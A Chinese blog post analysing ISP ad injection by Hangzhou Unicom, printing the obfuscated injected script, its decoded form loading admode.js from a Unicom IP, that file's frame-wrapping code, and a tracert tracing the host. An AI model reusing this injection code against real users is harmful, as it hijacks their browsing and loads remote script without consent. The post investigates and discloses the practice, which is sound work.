最新消息:走过的,离开的,已经错过,新开始2016

杭州联通的ISP广告劫持

技术随笔 果果 10297浏览 2评论

最近装了杭州联通那个980两年的4M的宽带,不过困扰也来了,现在每次一开机打开网页就要跑出一个右下角漂浮,有的时候还弹出几个广告窗口,各种杀毒,查木马,查插件,没有收获,最近在VM里面装了一个新的XP系统,打开网页也弹出一样的广告,火了,我VM新的XP没有中毒中插件 吧,怎么也弹出广告,怀疑我的网站被黑了,挂马了,用右键查看代码,发现有一个框架,查看框架代码得到:

<script>var d=”=iunm?=ifbe?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00235/271/338/222;910benpef/kt#?=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#?wbs!qbsbn>#iuuq;00235/271/338/222;910b0t@g>betuzmf`nto/iunm’beje>311983’uddb>bIqicHmic4io’vsjq>3197397481’psmv>bIS1dEpwM4e4ez6vZX6oeXG6[T6kc31wen:lMYOpc4dubXRuPD6peH2t’tqj”;function i(_,__){_+=__;var $=””;for(var u=0;u<_.length;u++){var r=_.charCodeAt(u);$+=String.fromCharCode(r-1);}return $;} var c=”e>487367:471’bsfb>2’ut>2448:31639’bpsmv>bIS1dEpwM3JvNUexdINvZ3:uM{V5eH:v[3Op[X6oM4qp[XqqZX6oNR>>’q2bsn>436’q3bsn>411’q4bsn>36’q5bsn>6’q6bsn>4’q7bsn>2’bqqe>1’ibtDpvou>1’ibtXijufVtfs>1#<=0tdsjqu?=0ifbe?=cpez!je>#c#!sjhiuNbshjo>1!upqNbshjo>1!mfguNbshjo>1!tdspmm>op!pompbe>#joju)qbsbn*#?=0cpez?=0iunm?”;document.write(i(d,c));</script>

通过解码得到下面代码:

<html><head><script>var d=”=iunm?=ifbe?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00235/271/338/222;910benpef/kt#?=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#?wbs!qbsbn>#iuuq;00235/271/338/222;910b0t@g>betuzmf`nto/iunm’beje>311983’uddb>bIqicHmic4io’vsjq>3197397481’psmv>bIS1dEpwM4e4ez6vZX6oeXG6[T6kc31wen:lMYOpc4dubXRuPD6peH2t’tqj”;function i(_,__){_+=__;var $=””;for(var u=0;u<_.length;u++){var r=_.charCodeAt(u);$+=String.fromCharCode(r-1);}return $;} var c=”e>487367:471’bsfb>2’ut>2448:31639’bpsmv>bIS1dEpwM3JvNUexdINvZ3:uM{V5eH:v[3Op[X6oM4qp[XqqZX6oNR>>’q2bsn>436’q3bsn>411’q4bsn>36’q5bsn>6’q6bsn>4’q7bsn>2’bqqe>1’ibtDpvou>1’ibtXijufVtfs>1#<=0tdsjqu?=0ifbe?=cpez!je>#c#!sjhiuNbshjo>1!upqNbshjo>1!mfguNbshjo>1!tdspmm>op!pompbe>#joju)qbsbn*#?=0cpez?=0iunm?”;document.write(i(d,c));</script><script type=”text/javascript” src=”http://124.160.227.111:80/admode.js”></script><script type=”text/javascript”>var param=”http://124.160.227.111:80/a/s?f=adstyle_msn.html&adid=200872&tcca=aHphbGlhb3hn&urip=2086286370&orlu=aHR0cDovL3d3dy5uYW5ndWF5ZS5jb20vdm9kLXNob3ctaWQtOC5odG1s&spid=3762569360&area=1&ts=1337920528&aorlu=aHR0cDovL2IuMTdwcHMuY29tLzU4dG9uZ2NoZW5nL3poZWppYW5nMQ==&p1arm=325&p2arm=300&p3arm=25&p4arm=5&p5arm=3&p6arm=1&appd=0&hasCount=0&hasWhiteUser=0″;</script></head><body id=”b” rightmargin=”0″ topmargin=”0″ leftmargin=”0″ scroll=”no” onload=”init(param)”><iframe frameborder=”0″ width=”100%” height=”100%” scrolling=”auto” src=”http://www.nanguaye.com/vod-show-id-8.html?t=1337919471394″></iframe></body></html>

查看admode.js 内容:

var location;top.window.moveTo(0,0);top.window.resizeTo(screen.availWidth,screen.availHeight);
function init(param){var html=”<iframe frameBorder=0 width=100% height=100% scrolling=auto src='”;if(top===window.self && document.body.clientWidth>=500 && document.body.clientHeight>=500){html+=param;}else{html+=decodeBase64(getPara(“orlu”,param));html=addOrUpdateParam(html,”t”,(new Date()).getTime());}document.getElementById(“b”).innerHTML=html+”‘></iframe>”;}
function getPara(paraName,paraStr){var oRegex=new RegExp(‘[\?&]’+paraName+’=([^&]+)’,’i’);var oMatch=oRegex.exec(paraStr);if(oMatch && oMatch.length>1){return oMatch[1];}else{return ”;}}
function decodeBase64(base64Str){var b=new Base64();return b.decode(base64Str);}
function addOrUpdateParam(html,skey,sval){var oVal = getPara(skey,html);if(oVal != ”){if(html.indexOf(skey+’=’+oVal)>0){html = html.replace(skey+’=’+oVal,skey+”=”+sval);}else if(html.indexOf(‘&’+skey+’=’)>0){html = html.replace(‘&’+skey+”=”+oVal,’&’+skey+”=”+sval);}}else{if(html.indexOf(‘?’) > 0){html = html + “&” + skey+”=”+sval;}else {html = html + “?” + skey+”=”+sval;}}return html;}
function Base64(){_keyStr=”ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=”;
this.decode=function(input){var output=””;var chr1,chr2,chr3;var enc1,enc2,enc3,enc4;var i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,””);while(i<input.length){enc1=_keyStr.indexOf(input.charAt(i++));enc2=_keyStr.indexOf(input.charAt(i++));enc3=_keyStr.indexOf(input.charAt(i++));enc4=_keyStr.indexOf(input.charAt(i++));chr1=(enc1 << 2) | (enc2 >> 4);chr2=((enc2 & 15) << 4) | (enc3 >> 2);chr3=((enc3 & 3) << 6) | enc4;output=output + String.fromCharCode(chr1);if(enc3!=64){output=output+String.fromCharCode(chr2);}if(enc4!=64){output=output+String.fromCharCode(chr3);}}output=_utf8_decode(output);return output;}
_utf8_decode=function(utftext){var string=””;var i=0;var c=c1=c2=0;while(i<utftext.length){c=utftext.charCodeAt(i);if(c<128){string+=String.fromCharCode(c);i++;}else if((c>191) && (c<224)){c2=utftext.charCodeAt(i+1);string+=String.fromCharCode(((c & 31) << 6) | (c2 & 63));i+=2;}else{c2=utftext.charCodeAt(i+1);c3=utftext.charCodeAt(i+2);string+=String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));i+=3;}}return string;}}

 

通过tracert,124.160.227.111这个就是联通机房的IP,可见这个广告就是联通加的

C:\Users\guoguo>tracert -d 124.160.227.111

通过最多 30 个跃点跟踪到 124.160.227.111 的路由

1 2 ms 1 ms 1 ms 192.168.0.1
2 34 ms 29 ms 36 ms 124.90.52.1
3 30 ms 30 ms 30 ms 123.157.220.133
4 34 ms 31 ms 31 ms 124.160.95.162
5 30 ms 30 ms 30 ms 124.160.227.102
6 33 ms 31 ms 31 ms 124.160.227.111

 

于是打电话10010直接投诉,接线客服还是很明白的,一说就明白了,在核实了姓名,宽带账号,身份证号码后,说要给我屏蔽一下

无语,看看,这一切都证明,很无耻啊

 

 

转载请注明:果果.IT » 杭州联通的ISP广告劫持

发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

网友最新评论 (2)

  1. 怎么解码?求解
    网通12年前 (2012-07-15)
  2. 请问怎么解码 谢谢 我也被劫持
    求助!!12年前 (2012-07-23)